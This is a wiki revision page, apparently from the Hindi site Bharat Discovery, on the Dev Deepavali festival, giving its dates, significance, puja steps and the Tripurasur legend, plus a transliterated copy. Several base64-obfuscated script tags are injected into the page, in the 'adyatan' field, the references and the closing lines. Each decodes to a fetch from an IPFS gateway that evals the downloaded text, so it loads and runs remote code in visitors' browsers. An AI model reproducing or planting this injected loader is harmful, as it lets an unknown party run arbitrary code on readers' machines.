Difference between revisions of "देव दीपावली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''देव दीपावली''' [[दिवाली]] के 15 दिन बाद मनाई जाती है। माना जाता है कि इस दिन [[देवता]] धरती पर आकर पवित्र [[गंगा नदी]] के किनारे दीप जलाते हैं। इस दिन [[शिव]] और [[विष्णु]] की पूजा की जाती है| कार्तिक मास के [[शुक्ल पक्ष]] की [[पूर्णिमा]] [[तिथि]] को देव दीपावली का त्योहार (Dev Deepawali Festival) मनाया जाता है। पुराणों के अनुसार इसी दिन भगवान शिव ने त्रिपुरासुर नाम के राक्षस का वध किया था। इसी कारण से इसे 'त्रिपुरी पूर्णिमा' के नाम से भी जाना जाता है। इस बात की खुशी को दर्शाने के लिए देव दीपावली के दिन सभी देवता धरती पर आकर गंगा किनारे दीप प्रज्वलित करते हैं और इसी कारण से हर साल देव दीपावली का त्योहार मनाया जाता है।
+
{{सूचना बक्सा संक्षिप्त परिचय
==तिथि==
+
|चित्र=Dev-Deepavali.jpg
[[कार्तिक पूर्णिमा]] वर्ष [[2020]] में [[30 नवंबर]] को मनाई जाएगी। कार्तिक मास का समापन पूर्णिमा के साथ ही हो जाएगा। कार्तिक मास की पूर्णिमा के दिन ही देवताओं की दीपावली होती है। [[देवोत्थान एकादशी]] के दिन देवता चार महीने सोने के बाद उठते हैं और उनके उठने की खुशी में ही कार्तिक पूर्णिमा के दिन देव दीपावली मनाई जाती है, लेकिन 2020 में पूर्णिमा का प्रारंभ 29 नवंबर से ही हो रहा है, इसलिए देव दिपावली इस बार 29 नंवबर को ही मनाई जाएगी, जबकि दान-पुण्य और पूजा आदि पूर्णिमा का [[30 नवंबर]] को होगा। कार्तिक पूर्णिमा को 'त्रिपुरी पूर्णिमा' या 'त्रिपुरारी पूर्णिमा' के नाम से भी जाना जाता है।<ref>{{cite web |url=https://www.timesnowhindi.com/spirituality/vrat-festivals/article/dev-diwali-2020-kartik-purnima-2020-dates-tithi/320797 |title=इस बार Kartik Purnima से पहले मनाई जाएगी देवी द‍िवाली|accessmonthday=09 नवंबर|accessyear=2020 |last= |first= |authorlink= |format= |publisher=timesnowhindi.com |language=हिंदी}}</ref>
+
|चित्र का नाम=देव दीपावली
====कार्तिक पूर्णिमा तिथि====
+
|विवरण='देव दीपावली' का पर्व पूरे [[भारत]] के विभिन्‍न हिस्‍सों में बड़ी धूमधाम से मनाया जाता है, लेकिन [[वाराणसी]], [[उत्तर प्रदेश]] में यह पर्व बहुत ही विशेष होता है।
पूर्णिमा तिथि प्रारम्भ - 29 नवम्बर, 2020 दोपहर 12 बजकर 47 मिनट से प्रारंभ होकर अगले दिन 30 नंवबर को दोपहर 2 बजकर 59 मिनट तक रहेगी। क्योंकि 30 की रात में पूर्णिमा नहीं होगी, इसलिए देव दीपावली 29 को होगी और पूर्णिमा रात से शुरू हो रही है तो पूर्णिमा की पूजा 30 नंवबर को होगी। कार्तिक पूर्णिमा का उत्सव प्रबोधिनी एकादशी से शुरू होता है।
+
|शीर्षक 1=अन्य नाम
 +
|पाठ 1=देव दिवाली, त्रिपुरोत्सव, त्रिपुरारी पूर्णिमा, त्रिपुरी पूर्णिमा
 +
|शीर्षक 2=तिथि
 +
|पाठ 2=[[कार्तिक माह]], [[शुक्ल पक्ष]], [[पूर्णिमा]]
 +
|शीर्षक 3=देश
 +
|पाठ 3=[[भारत]]
 +
|शीर्षक 4=धर्म
 +
|पाठ 4=[[हिन्दू धर्म]]
 +
|शीर्षक 5=मान्यता
 +
|पाठ 5=माना जाता है कि इस दिन देवी-देवता [[काशी]] के [[गंगा]] घाट पर दिवाली मनाने उतरते हैं।
 +
|शीर्षक 6=महत्त्व
 +
|पाठ 6=इस दिन पवित्र नदियों में [[स्नान]] करने और दीपदान करने का विशेष महत्व है।
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी=पौराणिक कथाओं के अनुसार, [[कार्तिक पूर्णिमा]] के दिन [[शिव]] ने त्रिपुरासुर राक्षस का वध किया था। त्रिपुरासुर के वध की खुशी में देवताओं ने [[काशी]] में अनेकों दीए जलाए थे। इसलिए काशी में देव दिवाली मनाई जाती है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|14:15, 8 नवम्बर 2022 (IST)}}
 +
}}'''देव दीपावली''' ([[अंग्रेज़ी]]: ''Dev Deepavali '') [[हिन्दू|हिन्दुओं]] के प्रसिद्ध त्योहार [[दीपावली]] के 15 दिन बाद मनाई जाती है। माना जाता है कि इस दिन [[देवता]] धरती पर आकर पवित्र [[गंगा नदी]] के किनारे दीप जलाते हैं। इस दिन [[शिव]] और [[विष्णु]] की पूजा की जाती है| कार्तिक मास के [[शुक्ल पक्ष]] की [[पूर्णिमा]] [[तिथि]] को देव दीपावली का त्योहार मनाया जाता है। पुराणों के अनुसार इसी दिन भगवान शिव ने त्रिपुरासुर नाम के राक्षस का वध किया था। इसी कारण से इसे 'त्रिपुरी पूर्णिमा' के नाम से भी जाना जाता है। इस बात की खुशी को दर्शाने के लिए देव दीपावली के दिन सभी देवता धरती पर आकर गंगा किनारे दीप प्रज्वलित करते हैं और इसी कारण से हर साल देव दीपावली का त्योहार मनाया जाता है।
 +
==तिथि, 2022==
 +
हिंदू पंचांग के अनुसार, वर्ष [[2022]] में देव दिवाली की तिथि [[7 नवंबर]], [[2022]] की शाम 4 बजकर 15 मिनट से शुरू हो रही है और [[8 नवंबर]] को शाम 4 बजकर 31 मिनट पर समाप्‍त होगी। उदया तिथि के अनुसार 8 नवंबर को देव दिवाली मनाई जानी थी, लेकिन इस दिन [[चंद्र ग्रहण]] होने से 7 नवंबर को देव दिवाली मनाई जाएगी। देव दीपावली के दिन शुभ मुहूर्त में दीपदान करना जीवन में अपार सुख-समृद्धि और सौभाग्‍य लाता है। 
 +
 
 +
प्रदोष काल में दीपदान का मुहूर्त- शाम 05:14 बजे से 07:49 बजे तक।
 
==महत्व==
 
==महत्व==
 
कार्तिक पूर्णिमा के दिन व्रत करने और दान-पुण्य करने का विशेष महत्व होता है। मान्यता है कि इस दिन व्रत-पूजन और दान करने से पापों की मुक्ति होती है और घर में सुख शांति-शांति और समृद्धि आती है। कार्तिक पूर्णिमा धार्मिक और आध्यात्मिक रूप से महत्वपूर्ण है, क्योंकि कार्तिक पूर्णिमा का व्रत और पूजन करने से भगवान विष्णु का आशीर्वाद प्राप्त होता है। धार्मिक आयोजन और आध्यात्मिक तपस्या करने के लिए कार्तिक पूर्णिमा को सबसे पवित्र दिन माना गया है। माना जाता है कि कार्तिक मे पूरे मास गंगा स्नान और दान आदि करने से 100 [[अश्वमेघ यज्ञ]] के समान पुण्य प्राप्त होता है।  
 
कार्तिक पूर्णिमा के दिन व्रत करने और दान-पुण्य करने का विशेष महत्व होता है। मान्यता है कि इस दिन व्रत-पूजन और दान करने से पापों की मुक्ति होती है और घर में सुख शांति-शांति और समृद्धि आती है। कार्तिक पूर्णिमा धार्मिक और आध्यात्मिक रूप से महत्वपूर्ण है, क्योंकि कार्तिक पूर्णिमा का व्रत और पूजन करने से भगवान विष्णु का आशीर्वाद प्राप्त होता है। धार्मिक आयोजन और आध्यात्मिक तपस्या करने के लिए कार्तिक पूर्णिमा को सबसे पवित्र दिन माना गया है। माना जाता है कि कार्तिक मे पूरे मास गंगा स्नान और दान आदि करने से 100 [[अश्वमेघ यज्ञ]] के समान पुण्य प्राप्त होता है।  
==देव दीपावली पूजा विधि==
+
==पूजा विधि==
 
#देव दीपावली के दिन साधक को गंगा स्नान अवश्य करना चाहिए और स्नान के बाद साफ वस्त्र धारण करने चाहिए।
 
#देव दीपावली के दिन साधक को गंगा स्नान अवश्य करना चाहिए और स्नान के बाद साफ वस्त्र धारण करने चाहिए।
 
*इस दिन भगवान शिव और भगवान विष्णु की पूजा की जाती है। लेकिन इनकी पूजा से पहले भगवान गणेश की विधिवत पूजा अवश्य करें।
 
*इस दिन भगवान शिव और भगवान विष्णु की पूजा की जाती है। लेकिन इनकी पूजा से पहले भगवान गणेश की विधिवत पूजा अवश्य करें।

Revision as of 08:45, 8 November 2022

dev dipavali
vivaran 'dev dipavali' ka parv poore bharat ke vibhinh‍n hish‍soan mean b di dhoomadham se manaya jata hai, lekin varanasi, uttar pradesh mean yah parv bahut hi vishesh hota hai.
any nam dev divali, tripurotsav, tripurari poornima, tripuri poornima
tithi kartik mah, shukl paksh, poornima
desh bharat
dharm hindoo dharm
manyata mana jata hai ki is din devi-devata kashi ke ganga ghat par divali manane utarate haian.
mahattv is din pavitr nadiyoan mean snan karane aur dipadan karane ka vishesh mahatv hai.
any janakari pauranik kathaoan ke anusar, kartik poornima ke din shiv ne tripurasur rakshas ka vadh kiya tha. tripurasur ke vadh ki khushi mean devataoan ne kashi mean anekoan die jalae the. isalie kashi mean dev divali manaee jati hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>dev dipavali (aangrezi: Dev Deepavali ) hinduoan ke prasiddh tyohar dipavali ke 15 din bad manaee jati hai. mana jata hai ki is din devata dharati par akar pavitr ganga nadi ke kinare dip jalate haian. is din shiv aur vishnu ki pooja ki jati hai| kartik mas ke shukl paksh ki poornima tithi ko dev dipavali ka tyohar manaya jata hai. puranoan ke anusar isi din bhagavan shiv ne tripurasur nam ke rakshas ka vadh kiya tha. isi karan se ise 'tripuri poornima' ke nam se bhi jana jata hai. is bat ki khushi ko darshane ke lie dev dipavali ke din sabhi devata dharati par akar ganga kinare dip prajvalit karate haian aur isi karan se har sal dev dipavali ka tyohar manaya jata hai.

tithi, 2022

hiandoo panchaang ke anusar, varsh 2022 mean dev divali ki tithi 7 navanbar, 2022 ki sham 4 bajakar 15 minat se shuroo ho rahi hai aur 8 navanbar ko sham 4 bajakar 31 minat par samaph‍t hogi. udaya tithi ke anusar 8 navanbar ko dev divali manaee jani thi, lekin is din chandr grahan hone se 7 navanbar ko dev divali manaee jaegi. dev dipavali ke din shubh muhoort mean dipadan karana jivan mean apar sukh-samriddhi aur saubhagh‍y lata hai.

pradosh kal mean dipadan ka muhoort- sham 05:14 baje se 07:49 baje tak.

mahatv

kartik poornima ke din vrat karane aur dan-puny karane ka vishesh mahatv hota hai. manyata hai ki is din vrat-poojan aur dan karane se papoan ki mukti hoti hai aur ghar mean sukh shaanti-shaanti aur samriddhi ati hai. kartik poornima dharmik aur adhyatmik roop se mahatvapoorn hai, kyoanki kartik poornima ka vrat aur poojan karane se bhagavan vishnu ka ashirvad prapt hota hai. dharmik ayojan aur adhyatmik tapasya karane ke lie kartik poornima ko sabase pavitr din mana gaya hai. mana jata hai ki kartik me poore mas ganga snan aur dan adi karane se 100 ashvamegh yajn ke saman puny prapt hota hai.

pooja vidhi

  1. dev dipavali ke din sadhak ko ganga snan avashy karana chahie aur snan ke bad saph vastr dharan karane chahie.
  • is din bhagavan shiv aur bhagavan vishnu ki pooja ki jati hai. lekin inaki pooja se pahale bhagavan ganesh ki vidhivat pooja avashy karean.
  • bhagavan shiv ko is din pooja mean pushp, ghi, naivedy, belapatr arpit karean aur bhagavan vishnu ko pooja mean pile phool, naivedy, pile vastr, pili mithaee arpit karean.
  • isake bad bhagavan shiv aur bhagavan vishnu ki vidhivat pooja karean aur dev dipavali ki katha sunean.
  • katha sunane ke bad bhagavan ganesh, bhagavan shiv aur bhagavan vishnu ki dhoop v dipak se arati utarean.
  • aant mean shiv aur vishnu ko mithaee ka bhog lagaean aur sham ke samay ganga ghat par dipak jalaean. yadi ap aisa nahian kar sakate to apane ghar ke mukhy dvar par to dipak avashy jalaean.[1]

katha

pauranik katha ke anusar tripur namak rakshas ne ek ek lakh varsh tak tirtharaj prayag mean kathor tap kiya tha. usaki tapasya se tinoan lok hilane lage the. tripur ki tapasya dekhakar sabhi devata gan bhayabhit ho ge aur unhoanne tripur ki tapasya bhang karane ka nishchay kiya. isake lie unhoanne apsaraoan ko tripur ke pas usaki tapasya bhang karane ke lie bheja lekin vah apsaraean tripur ki tapasya bhang nahi kar saki. aant mean brahma ko tripur ki tapasya ke age vivash hokar use var dene ke lie ana hi p da.

brahma ne tripur ke pas akar use var maangane ke lie kaha. tripur ne brahma ji kisi manushy ya devata ke hathoan n mare jane ka varadan maanga. isake bad tripur ne svargalok par akraman kar diya. sabhi devataoan ne ek yojana banakar tripur ko shiv ke sath yuddh karane mean vyast kar diya. jisake bad bhagavan shiv aur tripur ke bich mean bhayankar yuddh hua. bhagavan shiv ne brahma aur vishnu ki sahayata prapt karake tripur ka aant kar diya. isi karan se devata apani khushi ko jahir karane ke lie dipavali ka tyohar manate haian, jise dev dipavali ke nam se jana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika-tippani aur sandarbh

  1. dev dipavali (hiandi) timesnowhindi.com. abhigaman tithi: 09 navanbar, 2020.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>